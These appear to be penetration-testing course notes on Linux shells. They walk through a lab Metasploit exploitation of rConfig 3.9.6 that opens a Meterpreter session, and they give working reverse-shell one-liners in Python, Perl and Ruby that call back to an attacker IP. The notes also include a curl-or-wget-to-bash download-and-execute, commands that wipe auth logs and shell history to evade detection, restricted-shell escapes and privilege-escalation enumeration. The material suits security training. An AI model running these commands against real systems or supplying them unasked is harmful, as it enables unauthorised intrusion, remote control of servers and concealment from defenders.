🐧NIX Shells

Overview

According to W3Techs' ongoing OS usage statistics study, over 70% of websites (webservers) run on Unix-based systems. This presents significant opportunities for penetration testers to gain shell sessions on these environments and potentially pivot further within network infrastructures.

Strategic Importance

Why Unix/Linux Shells Matter:

• Web server dominance: Most web applications run on Linux

• Infrastructure backbone: Critical systems often run on Unix/Linux

• Pivot opportunities: Web servers can provide access to internal networks

• On-premises hosting: Many organizations still host internally

• Cloud environments: Most cloud instances run Linux variants

Attack Surface Considerations:

• Web applications and services

• Network services (SSH, FTP, etc.)

• Database services (MySQL, PostgreSQL)

• Configuration management tools

• Container orchestration platforms

Common Considerations

When planning to establish a shell session on a Unix/Linux system, consider these critical questions:

1. System Analysis Questions

Distribution Identification:

• What distribution of Linux is the system running?

• What version and kernel are in use?

• What package manager is available?

Shell & Programming Environment:

• What shells are available? (bash, sh, zsh, csh)

• What programming languages exist? (Python, Perl, Ruby, PHP)

• What interpreters are installed?

• Are there any restricted shells in place?

Functional Purpose:

• What function is the system serving for the network?

• Is it a web server, database server, or application server?

• What services are running?

• What is the system's role in the infrastructure?

Application Stack:

• What application is the system hosting?

• What web server software? (Apache, Nginx, Lighttpd)

• What application frameworks? (PHP, Python, Node.js)

• What databases are connected?

Security Posture:

• Are there any known vulnerabilities?

• What security controls are in place?

• Are there any misconfigurations?

• What is the patch level?

2. Reconnaissance Strategy

Service Enumeration:

# Port scanning
nmap -sC -sV target_ip

# Version detection
nmap -sV --version-intensity 9 target_ip

# Script scanning
nmap --script vuln target_ip

Web Application Assessment:

# Directory enumeration
gobuster dir -u http://target_ip -w /usr/share/wordlists/common.txt

# Technology detection
whatweb http://target_ip

# SSL/TLS analysis
sslyze target_ip:443

Gaining a Shell Through Attacking a Vulnerable Application

Step 1: Host Enumeration

Comprehensive Nmap Scan:

nmap -sC -sV 10.129.201.101

Sample Output Analysis:

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 2.0.8 or later
22/tcp   open  ssh      OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34)
443/tcp  open  ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34)
3306/tcp open  mysql    MySQL (unauthorized)
111/tcp  open  rpcbind  2-4 (RPC #100000)

Information Gathered:

• Operating System: CentOS Linux

• Web Stack: Apache 2.4.6, PHP 7.2.34, OpenSSL 1.0.2k

• Services: FTP, SSH, HTTP/HTTPS, MySQL, RPC

• Function: Web server hosting web application

• SSL Configuration: Self-signed certificate present

Step 2: Web Application Discovery

Initial Web Reconnaissance:

• Navigate to HTTP/HTTPS endpoints

• Identify hosted applications

• Check for version information

• Look for default credentials

Example: rConfig Discovery

• Application: rConfig Configuration Management Tool

• Purpose: Network device configuration automation

• Version: 3.9.6 (visible on login page)

• Critical Risk: Admin access to network infrastructure

rConfig Significance:

• Automates network appliance configuration

• Remote interface configuration capabilities

• Potential access to routers, switches, firewalls

• High-value target for network compromise

• Could lead to complete network infrastructure control

Step 3: Vulnerability Research

Research Methodology:

1. Version-specific searches: "rConfig 3.9.6 vulnerability"

2. CVE databases: Check NIST, MITRE, ExploitDB

3. Security advisories: Vendor bulletins, security researchers

4. Proof of concepts: GitHub, security blogs

5. Metasploit modules: Built-in exploit framework

Search Results for rConfig 3.9.6:

• CVE-2019-16662: Arbitrary file upload to RCE

• CVE-2019-16663: Authentication bypass

• Multiple vulnerabilities: Configuration disclosure, SQL injection

Step 4: Metasploit Module Discovery

Search for Exploits:

msf6 > search rconfig

Available Modules:

#  Name                                             Disclosure Date  Rank       Description
0  exploit/multi/http/solr_velocity_rce             2019-10-29       excellent  Apache Solr RCE via Velocity Template
1  auxiliary/gather/nuuo_cms_file_download          2018-10-11       normal     Nuuo CMS Authenticated File Download
2  exploit/linux/http/rconfig_ajaxarchivefiles_rce  2020-03-11       good       Rconfig 3.x Chained RCE
3  exploit/unix/webapp/rconfig_install_cmd_exec     2019-10-28       excellent  rConfig install Command Execution

Module Selection Criteria:

• Target specificity: Matches exact version

• Reliability rank: Good to excellent ranking

• Functionality: Provides shell access

• Prerequisites: Authentication requirements

Step 5: Advanced Exploit Research

GitHub Repository Search:

# Search pattern
"rConfig 3.9.6 exploit metasploit github"

Manual Module Installation:

# Locate MSF directories
locate exploits | grep metasploit

# Typical MSF path
/usr/share/metasploit-framework/modules/exploits

# Download and install custom module
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/rconfig_vendors_auth_file_upload_rce.rb

# Copy to appropriate directory
cp rconfig_vendors_auth_file_upload_rce.rb /usr/share/metasploit-framework/modules/exploits/linux/http/

Metasploit Updates:

# Update package manager
apt update && apt install metasploit-framework

# Reload MSF modules
msfconsole -x "reload_all"

Exploiting rConfig - Practical Example

Step 1: Module Selection and Configuration

Load the Exploit:

msf6 > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce

View Module Options:

msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > show options

Required Configuration:

set RHOSTS 10.129.201.101
set RPORT 443
set SSL true
set LHOST 10.10.14.111
set LPORT 4444

Step 2: Exploit Execution

Launch the Attack:

msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > exploit

Exploitation Process:

[*] Started reverse TCP handler on 10.10.14.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 3.9.6 of rConfig found !
[+] The target appears to be vulnerable. Vulnerable version of rConfig found !
[+] We successfully logged in !
[*] Uploading file 'olxapybdo.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 10.129.201.101
[+] Deleted olxapybdo.php
[*] Meterpreter session 1 opened (10.10.14.111:4444 -> 10.129.201.101:38860)

Exploit Steps Breakdown:

1. Version Detection: Confirms vulnerable rConfig 3.9.6

2. Authentication: Successfully logs into rConfig

3. Payload Upload: Uploads PHP-based reverse shell

4. Payload Trigger: Executes uploaded payload

5. Stage Transfer: Sends Meterpreter stage

6. Cleanup: Removes uploaded payload file

7. Session Establishment: Provides Meterpreter shell

Step 3: Initial Shell Interaction

Meterpreter Session:

meterpreter > dir
Listing: /home/rconfig/www/images/vendor
========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  673   fil   2020-09-03 05:49:58 -0400  ajax-loader.gif
100644/rw-r--r--  1027  fil   2020-09-03 05:49:58 -0400  cisco.jpg
100644/rw-r--r--  1017  fil   2020-09-03 05:49:58 -0400  juniper.jpg

Drop to System Shell:

meterpreter > shell
Process 3958 created.
Channel 0 created.

# Test basic commands
dir
ajax-loader.gif  cisco.jpg  juniper.jpg

ls
ajax-loader.gif
cisco.jpg
juniper.jpg

Shell Improvement Techniques

Understanding Non-TTY Shells

Characteristics of Non-TTY Shells:

• Limited functionality: Missing interactive features

• No prompt: Commands execute without visual feedback

• Restricted commands: su, sudo, nano may not work

• No tab completion: Manual command entry required

• No command history: Previous commands not accessible

• Signal handling issues: Ctrl+C may terminate session

Why Non-TTY Shells Occur:

• Service account execution: Payload runs as web server user (apache)

• Environment limitations: No shell environment configured

• Security restrictions: Limited shell access by design

Spawning TTY Shells

Method 1: Python PTY

Check for Python:

which python
which python3

Spawn TTY with Python:

python -c 'import pty; pty.spawn("/bin/sh")'

Enhanced Python TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Result:

sh-4.2$ whoami
apache
sh-4.2$ pwd
/home/rconfig/www/images/vendor

Method 2: Alternative TTY Methods

Using Script Command:

script -qc /bin/bash /dev/null

Using Expect:

expect -c "spawn $SHELL; interact"

Using Socat (if available):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.111:4445

Method 3: Full Interactive TTY

Step 1: Initial PTY spawn

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 2: Background the session

# Press Ctrl+Z to background

Step 3: Configure local terminal

stty raw -echo && fg

Step 4: Reset terminal

reset
export SHELL=bash
export TERM=xterm-256color
stty rows <rows> columns <columns>

Linux Shell Environments

Common Linux Shells

Shell	Binary	Description	Features
Bash	/bin/bash	Bourne Again Shell	Command completion, history, scripting
Sh	/bin/sh	Bourne Shell	Basic POSIX compliance, minimal features
Zsh	/bin/zsh	Z Shell	Advanced features, customization
Csh	/bin/csh	C Shell	C-like syntax, job control
Tcsh	/bin/tcsh	TENEX C Shell	Enhanced C shell
Fish	/bin/fish	Friendly Interactive Shell	User-friendly, auto-suggestions

Shell Detection and Switching

Current Shell Detection:

echo $SHELL
echo $0
ps -p $$

Available Shells:

cat /etc/shells
which bash zsh csh tcsh

Switch Shells:

# Switch to bash
/bin/bash

# Switch to zsh
/bin/zsh

# Switch with login environment
su - username

Programming Languages on Linux

Python Environment

Version Detection:

python --version
python3 --version
which python python3

Module Availability:

python -c "import sys; print(sys.path)"
python3 -c "import pty, subprocess, os; print('Available')"

Common Python Exploits:

# Command execution
python -c "import os; os.system('whoami')"

# Reverse shell
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.111',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

Perl Environment

Availability Check:

which perl
perl --version

Perl Exploits:

# Command execution
perl -e 'system("whoami")'

# Reverse shell
perl -e 'use Socket;$i="10.10.14.111";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Environment

Availability Check:

which ruby
ruby --version

Ruby Exploits:

# Command execution
ruby -e 'system("whoami")'

# Reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.10.14.111",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Linux Distribution Specifics

Package Managers by Distribution

Distribution	Package Manager	Commands
Ubuntu/Debian	apt	apt update, apt install
CentOS/RHEL	yum/dnf	yum install, dnf install
Fedora	dnf	dnf install, dnf update
SUSE	zypper	zypper install, zypper update
Arch Linux	pacman	pacman -S, pacman -Syu
Alpine	apk	apk add, apk update

Distribution Detection

OS Release Information:

cat /etc/os-release
cat /etc/*-release
lsb_release -a

Kernel Information:

uname -a
cat /proc/version
hostnamectl

System Information:

cat /etc/issue
cat /etc/motd

Advanced Linux Exploitation Techniques

Container Environment Detection

Docker Detection:

cat /proc/1/cgroup | grep docker
ls -la /.dockerenv
cat /proc/self/mountinfo | grep docker

Container Escape Techniques:

# Check for privileged containers
capsh --print

# Look for mounted host filesystem
mount | grep -E "(proc|sys|dev)"

# Check for socket access
ls -la /var/run/docker.sock

Privilege Escalation Enumeration

User Context:

whoami
id
groups
sudo -l

SUID/SGID Binaries:

find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

Writable Directories:

find / -writable -type d 2>/dev/null
find /tmp -type f -perm -o+w 2>/dev/null

Process Analysis:

ps aux
ps -ef
pstree

Network Connections:

netstat -tulpn
ss -tulpn
lsof -i

Persistence Mechanisms

Cron Jobs:

crontab -l
cat /etc/crontab
ls -la /etc/cron.*

Service Files:

systemctl list-unit-files
ls -la /etc/systemd/system/
ls -la /etc/init.d/

Startup Scripts:

ls -la /etc/rc*.d/
cat /etc/rc.local

Common Linux Vulnerabilities

Kernel Exploits

Kernel Version Check:

uname -r
cat /proc/version

Common Kernel Exploits:

• DirtyCow: CVE-2016-5195

• Overlayfs: CVE-2021-3493

• PwnKit: CVE-2021-4034

• Baron Samedit: CVE-2021-3156

Application-Specific Vulnerabilities

Web Applications:

• PHP vulnerabilities and misconfigurations

• CGI script vulnerabilities

• File upload vulnerabilities

• SQL injection leading to file write

Network Services:

• SSH misconfigurations

• FTP anonymous access

• NFS exports with no_root_squash

• SMB/CIFS shares

Detection Evasion on Linux

Log Management

Common Log Locations:

/var/log/auth.log       # Authentication logs
/var/log/syslog         # System logs
/var/log/apache2/       # Apache logs
/var/log/nginx/         # Nginx logs
/var/log/secure         # CentOS/RHEL auth logs

Log Cleanup:

# Clear specific logs
> /var/log/auth.log
> /var/log/syslog

# Clear command history
history -c
> ~/.bash_history
unset HISTFILE

Process Hiding

Background Processes:

nohup command &
screen -dmS session_name command
tmux new-session -d -s session_name command

Memory-only Execution:

# Execute from memory
curl -s http://10.10.14.111/script.sh | bash
wget -qO- http://10.10.14.111/script.py | python3

Best Practices for Linux Exploitation

Reconnaissance

1. Thorough enumeration of services and versions

2. Web application assessment for vulnerabilities

3. Configuration analysis for misconfigurations

4. User enumeration for potential targets

Exploitation

1. Research target-specific vulnerabilities thoroughly

2. Test exploits in controlled environments first

3. Understand exploit mechanisms before deployment

4. Plan payload delivery based on target constraints

Post-Exploitation

1. Stabilize shell access immediately

2. Gather system intelligence for privilege escalation

3. Establish persistence if authorized

4. Document findings for reporting

Operational Security

1. Minimize log generation during testing

2. Clean up artifacts after assessment

3. Use encrypted communications when possible

4. Understand detection mechanisms in environment

Advanced Shell Spawning Techniques

When Python is not available on the target system, several alternative methods can be used to spawn interactive shells. Understanding these techniques is crucial for situations where primary methods fail.

Shell Interpreter Direct Execution

/bin/sh Interactive Mode

Basic Interactive Shell:

/bin/sh -i

Expected Output:

sh: no job control in this shell
sh-4.2$

Features:

• Interactive mode (-i): Enables interactive functionality

• Basic shell: Minimal features but reliable

• Wide compatibility: Available on most Unix/Linux systems

• Job control limitation: No background process management

Alternative Shell Binaries

Bash Interactive:

/bin/bash -i

Dash Interactive:

/bin/dash -i

Zsh Interactive:

/bin/zsh -i

Programming Language Spawning

Perl Shell Spawning

Direct Execution:

perl -e 'exec "/bin/sh";'

Script-based Execution:

# From within a Perl script
exec "/bin/sh";

Alternative Perl Methods:

# Using system call
perl -e 'system("/bin/sh");'

# Using backticks
perl -e '`/bin/sh`;'

Ruby Shell Spawning

Direct Execution:

ruby -e 'exec "/bin/sh"'

Script-based Execution:

# From within a Ruby script
exec "/bin/sh"

Alternative Ruby Methods:

# Using system call
ruby -e 'system("/bin/sh")'

# Using Process.spawn
ruby -e 'Process.spawn("/bin/sh")'

Lua Shell Spawning

OS Execute Method:

lua -e "os.execute('/bin/sh')"

Script-based Execution:

-- From within a Lua script
os.execute('/bin/sh')

Alternative Lua Methods:

-- Using io.popen
lua -e "io.popen('/bin/sh'):read('*all')"

System Utility Spawning

AWK Shell Spawning

BEGIN Block Method:

awk 'BEGIN {system("/bin/sh")}'

Pattern-based Method:

awk '{system("/bin/sh")}' /etc/passwd

One-liner with File:

echo | awk '{system("/bin/sh")}'

Features:

• C-like language: Pattern scanning and processing

• Widely available: Present on most Unix/Linux systems

• System function: Direct system command execution

• Report generation: Original purpose for text processing

Find Command Spawning

Method 1: Find with AWK

find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

Method 2: Direct Execution

find . -exec /bin/sh \; -quit

Method 3: Interactive Find

find /etc -name passwd -exec /bin/sh \;

Find Command Breakdown:

• Search function: Looks for specified file

• Execute option (-exec): Runs command when file found

• Quit option (-quit): Stops after first match

• Flexible execution: Can execute any binary

VIM Editor Spawning

Method 1: Command Line Option

vim -c ':!/bin/sh'

Method 2: Interactive VIM

vim
:set shell=/bin/sh
:shell

Method 3: VIM Bang Command

vim
:!/bin/sh

VIM Features:

• Command mode: Execute shell commands

• Shell setting: Configure default shell

• Bang commands: Direct command execution

• Editor escape: Break out of text editing context

Advanced Alternative Methods

Using Less/More Pagers

Less Command:

less /etc/passwd
# Then type: !/bin/sh

More Command:

more /etc/passwd
# Then type: !/bin/sh

Using Man Pages

Man Command:

man ls
# Then type: !/bin/sh

Using ED Editor

ED Line Editor:

ed
!/bin/sh

Using Expect

Expect Spawn:

expect -c "spawn /bin/sh; interact"

Binary and Language Detection

Check Available Interpreters

Programming Languages:

which python python3 perl ruby lua
which awk gawk mawk
which vim nano emacs
which less more man

Shell Interpreters:

cat /etc/shells
which bash sh zsh csh tcsh fish

System Utilities:

which find locate ed sed
which expect script socat

Capability Assessment

Test Command Execution:

# Test basic commands
ls /bin/sh
ls /bin/bash
ls /usr/bin/python*

# Test permissions
ls -la /bin/sh
ls -la /usr/bin/vim

Permission and Privilege Considerations

File Permission Analysis

Check Binary Permissions:

ls -la <path/to/fileorbinary>

Example Output:

-rwxr-xr-x 1 root root 154072 Apr  18  2019 /bin/sh
-rwxr-xr-x 1 root root    35048 Apr  18  2019 /usr/bin/awk
-rwxr-xr-x 1 root root   3027776 Apr  18  2019 /usr/bin/vim

Permission Breakdown:

• rwx: Owner (read, write, execute)

• r-x: Group (read, execute)

• r-x: Others (read, execute)

Sudo Permission Enumeration

Check Sudo Capabilities:

sudo -l

Sample Output:

Matching Defaults entries for apache on ILF-WebSrv:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User apache may run the following commands on ILF-WebSrv:
    (ALL : ALL) NOPASSWD: ALL

Sudo Analysis:

• NOPASSWD: ALL: Can run any command without password

• env_reset: Environment variables reset on sudo

• secure_path: Restricted PATH for sudo commands

Requirements for Sudo Check:

• Stable interactive shell: TTY required for input

• Working terminal: Proper shell environment

• User context: Current user permissions

Privilege Escalation Indicators

High-Privilege Indicators:

# Check for wheel group membership
groups
id

# Check for admin/sudo groups
cat /etc/group | grep -E "(sudo|admin|wheel)"

# Check for interesting SUID binaries
find / -perm -4000 -type f 2>/dev/null | grep -E "(vim|find|awk|perl|python)"

Shell Stability and Improvement

Stabilization Sequence

Step 1: Initial Shell Spawn

# Use any available method from above
python3 -c 'import pty; pty.spawn("/bin/bash")'
# OR
/bin/sh -i
# OR
awk 'BEGIN {system("/bin/sh")}'

Step 2: Environment Configuration

export TERM=xterm-256color
export SHELL=/bin/bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Step 3: History and Aliases

# Enable command history
set -o history
# Set useful aliases
alias ll='ls -la'
alias la='ls -A'

Shell Feature Testing

Test Interactive Features:

# Tab completion
ls /etc/<TAB><TAB>

# Command history
history

# Job control
sleep 60 &
jobs
fg

# Signal handling
# Try Ctrl+C, Ctrl+Z

Troubleshooting Shell Issues

Common Problems and Solutions

Problem 1: No Prompt Display

# Solution: Set PS1 variable
export PS1='$ '
# Or more detailed
export PS1='\u@\h:\w\$ '

Problem 2: Commands Not Found

# Solution: Check and set PATH
echo $PATH
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Problem 3: Terminal Size Issues

# Solution: Set terminal dimensions
stty rows 24 columns 80
# Or get current terminal size
stty size

Problem 4: No Tab Completion

# Solution: Enable programmable completion
set -o tabcompletion
# Or load bash completion
source /etc/bash_completion

Shell Escape Techniques

From Restricted Shells:

# Break out of rbash
export PATH=/bin:/usr/bin:$PATH
cd /tmp && exec bash

# Vim escape
vim
:set shell=/bin/bash
:shell

# Less/more escape
less /etc/passwd
!/bin/bash

# Python escape
python -c "import os; os.system('/bin/bash')"

Best Practices for Shell Spawning

Selection Strategy

1. Assess available resources on target system

2. Start with most reliable methods (Python, /bin/sh)

3. Fall back to system utilities if needed

4. Consider permission requirements for each method

5. Test shell stability after spawning

Operational Considerations

1. Minimize noise during shell spawning

2. Avoid triggering security alerts with unusual commands

3. Document successful methods for future reference

4. Plan for shell loss and recovery methods

5. Understand environment limitations before proceeding

Security Awareness

1. Monitor process creation that might be logged

2. Understand command auditing on target system

3. Consider shell history and logging implications

4. Plan cleanup procedures for spawned processes

5. Use appropriate shells for stealth requirements

Conclusion

Linux/Unix systems dominate the server landscape, making shell access skills essential for penetration testers. Success requires:

• Comprehensive enumeration to identify attack vectors

• Application-specific research for targeted exploits

• Shell improvement techniques for effective post-exploitation

• Multiple spawning methods when primary techniques fail

• Distribution awareness for platform-specific techniques

• Programming language utilization for payload delivery

• Detection evasion strategies for stealthy operations

The key to successful Linux exploitation lies in understanding the target environment, leveraging appropriate tools and techniques, and maintaining situational awareness throughout the engagement. Having multiple shell spawning techniques in your arsenal ensures success even when primary methods are unavailable. Regular practice with different distributions and scenarios will improve proficiency and success rates.